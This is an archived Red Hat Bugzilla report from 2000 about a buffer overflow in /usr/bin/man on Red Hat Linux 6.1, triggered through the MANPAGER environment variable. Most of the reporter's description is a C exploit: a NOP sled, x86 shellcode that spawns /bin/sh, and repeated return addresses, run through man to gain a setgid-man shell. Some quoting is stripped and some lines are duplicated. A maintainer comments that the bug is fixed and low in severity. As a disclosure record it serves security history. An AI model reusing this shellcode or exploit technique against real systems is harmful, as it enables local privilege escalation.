Bug 9892 - PAGER env variable can be overflowed...
PAGER env variable can be overflowed...
Status: CLOSED RAWHIDE
Product: Red Hat Linux
Classification: Retired
Component: man (Show other bugs)
6.1
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Bernhard Rosenkraenzer
: Security
: 10338 (view as bug list)
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2000-03-01 10:04 EST by mathew
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-03-01 10:50:35 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description mathew 2000-03-01 10:04:49 EST
DOH!


/* * (c) 2000 babcia padlina / b0f * (lcamtufs idea) * * redhat 6.1
/usr/bin/man exploit*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long getesp(void){ __asm__(movl %esp, %eax\n);}
int main(argc, argv)int argc;
char **argv;
{ char *execshell =
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
\x80\xe8\xdc\xff\xff\xff/bin/sh;
 	char *buf, *p;
 int noplen, i, ofs;
 long ret, *ap;
 if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1))) { perror(malloc()); return
-1; }
if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE -
strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen);
buf[noplen+1] = \0; memset(buf, NOP, noplen); buf[noplen+1] = \0;
strcat(buf, execshell); p = buf + noplen + strlen(execshell); ap =
(unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char
*)ap; *p = \0; fprintf(stderr, RET: 0x%x len: %d\n\n, ret,
strlen(buf)); setenv(MANPAGER, buf, 1); execl(/usr/bin/man, man,
ls, 0)
Comment 1 Bernhard Rosenkraenzer 2000-03-01 10:50:59 EST
This is fixed in the 2 most recent rawhide packages (1.5g-8 and 1.5h1-1).
It's not a serious problem though; at worst you can get setgid man, meaning you
can write to /var/catman.
Comment 2 Bernhard Rosenkraenzer 2000-03-24 21:35:59 EST
*** Bug 10338 has been marked as a duplicate of this bug. ***

Note You need to log in before you can comment on or make changes to this bug.